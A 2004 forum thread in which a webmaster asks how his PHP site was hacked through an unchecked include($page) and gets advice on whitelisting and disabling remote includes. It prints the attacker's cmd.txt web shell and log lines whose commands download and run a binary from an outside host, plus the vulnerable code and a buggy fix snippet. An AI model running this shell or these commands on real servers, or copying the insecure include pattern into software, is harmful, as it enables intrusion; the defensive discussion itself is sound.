Security problem :(

ovisopa

Hello ppl,
because this is my first post in 2004 I wish you all a Happy New Year :p .

Last night one of my site has been hacked 🙁 , today I downloaded the logs from the server and carefuly I searched for something, first it was the time since my site it's not working, I found it and it was since 23:34, this is after on hour of work for the hacker , i saw first acces of that hacker at 22:26 .

I made my site using include function, so I will explain in few words how it works,

<?
if($page == ''){
	include("main.php");
}
elseif($page == 'inscris'){
	include("$page.php");
	include("main.php");
}
else{
	include("$page.php");
}
?>

You can understand how i've done this, so if somebody enters in index.php the $page variable is null and it includes the main.php file and so on ... all the site is made using index.php file, so if I want to see another page from my site i simply acces index.php?page=another_page and it will include this file in the index file.

Now I ask you to make me understand how this works, because using this file the hacker had changed my index.php file to index_old.php and inserted a new index.php file and a picture in the root folder.

this is the content of cmd.txt

</center><font size="2"><pre>-
<?
  // cmd.txt by Havenard
  if (isset($chdir)) @chdir($chdir);
  ob_start();
  system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
-</pre>

now I will paste the urls that the hacker used

[04/Jan/2004:22:26:08 -0600] "GET /stylesheet.css HTTP/1.1" 200 3530 "http://www.grafitti.ro/?page=http://raulll0690.tripod.com/cmd.txt?&cmd=id;uname%20-a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

[04/Jan/2004:22:26:08 -0600] "GET /?page=http://raulll0690.tripod.com/cmd.txt?&cmd=id;uname%20-a HTTP/1.1" 200 17037 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
...

GET /?page=http://raulll0690.tripod.com/cmd.txt?&cmd=ls

http://www.grafitti.ro/?page=http://raulll0690.tripod.com/cmd.txt?&cmd=id;uname%20-a

/?page=http://raulll0690.tripod.com/cmd.txt?&cmd=touch%20a

/?page=http://raulll0690.tripod.com/cmd.txt?&cmd=cd%20/tmp;ls

/?page=http://raulll0690.tripod.com/cmd.txt?&cmd=cd%20/tmp;wget%20www.drwxr.hpg.ig.com.br/cgi

/?page=http://raulll0690.tripod.com/cmd.txt?&cmd=cd%20/tmp;cat%20horde.log

/?page=http://raulll0690.tripod.com/cmd.txt?&cmd=cd%20/tmp;chmod%20777%20cgi;./cgi

/?page=http://raulll0690.tripod.com/cmd.txt?&cmd=cd%20/tmp;wget%20www.drwxr.hpg.ig.com.br/cgi

/?page=http://raulll0690.tripod.com/cmd.txt?&cmd=pwd

I saw here alot of linux comands cd, ls, wget, chmod .... PWD 🙁

and I saw that he wrote this to : horde.log ... horde is an webmail client which my host offers me, there are 3 webmail clients. Is there something wrong with that webmail client ??

If you access this adress www.drwxr.hpg.ig.com.br/cgi you will seeonly this ELF , I found on my root folder a file called kmod which has this text in it 🙁

Can somebody tell me how I should verify the $page variable and what exactly did this hacker ??

10x in advance

see ya all

Moonglobe

well seeing as he probably used a remote file, you could turn allow_url_fopen off in php.ini (or .htaccess)... other than that's it's generally a bad idea to use [man]register_globals[/man] but i don't think that would've helped you in this particular situation. or it could have... it depends on the rest of your code.

ovisopa

Is there other way, because I'm not sure if I can change that (allow_url_fopen) because i'm on a shared server, I have Cpanel 8.5.3-STABLE 3 for administration.

With htacces file maibe is a good Ideea but I don't know what exactly i should write in that file, any help ?

And about register globals .. I should use $_GET['page'] instead $page ??? If I will make my site with sesions will be posible to be hacked like I was last night ???

What is the quickest method to solve the problem ??

10x

see ya all

drawmack

Instead of having an else, which essentially allows the hacker to load whatever page they want, you should have an explicit case for every valid page and a default page if the page variable is invalid. Something that informs the person you have logged their IP and their name and will be contacting their isp if further attempts at invalid access are made is preferable.

drawmack

Also turn off the ability for php to write to the directory that contains your index.

Here is how I would recomend doing this:
File 1 = pages.txt

file1.php
file2.php
file3.php
...

the above file lists all of the pages that are allowed to be included with a get variable.

File 2 = index.php

<?php
//place this at the top of the file
$allowed_files = file('pages.txt');
?>

<!-- more code and stuff !-->
<?php
//this replaces your current if statement

//if there is no include page specified
if (!array_key_exists($_GET['page']))
{
    $_GET['page'] = 'main.php';
} //end if

//if the page is valid as per being included in pages.txt
if (in_array($_GET['page'],$allowed_files)) 
{
    include($_GET[$page]);
} 
//if the page is not valid by not being included in pages.txt
else
{
    include('badboywarningmessagepage.php');
} //end if
?>

ovisopa

10x alot for the code you wroten there , but I was thinking on something much easier , and now I want your advice, and tell me if this is secure enough because you told me to create a file with all my files which needs to be included in my index.php file , wel there are some files 🙂 I was thinking to do it faster 🙂

What I've done is this :

<?
if($page == ''){
	include("main.php");
}
elseif($page == 'inscris'){
	include("$page.php");
	include("main.php");
}
else{
$file = "$page.php";
	if(file_exists ($file)){ 
		include("$page.php");
		}
	else{include("main.php");}
}
?>

Using the file_exists function I checked before the include function if the file exists in that directory,and if it is there then will include that file.

First i was trying to include the file using the site name before the file , like this :

else{
$file = "http://www.grafitti.ro/".$page.".php";
	if(file_exists ($file)){ 
		include("$page.php");
		}
	else{include("main.php");}
}
?>
[code=php]

but it's not working this way , anyting I try with the site name in the file_exists function it's not working :( .. I'm doing something wrong here ??? .... 

This is  an easier way but I not sure if it's safe enough, what's your opinion ???

10x and see ya all

drawmack

that would ensure that they are loading a local file. So it would prevent against this same type of attack in the future.

Moonglobe

but prevent you from using remost files, as file_exist only works locally.

ovisopa

🙂 so it's ok this way 🙂 I want to remove all the security isues which are caused by a mistake of the coder (me in this case🙁 ) ...

I still want an answer to this question, is more secure if I will recode the site and make it with sesions ???

10x for help .. you realy are good guys :p

ovisopa

Originally posted by Moonglobe
but prevent you from using remost files, as file_exist only works locally.

for now that was the only problem, remote files if you know other isues of my coding pls give me a mesage 🙂

see ya

Moonglobe

well no, really. how would a session be able to control the value of the URL? (besides passing the SID when cookies are unsupported of course) so really there's no security reason, for you, to use sessions. they are very useful though :p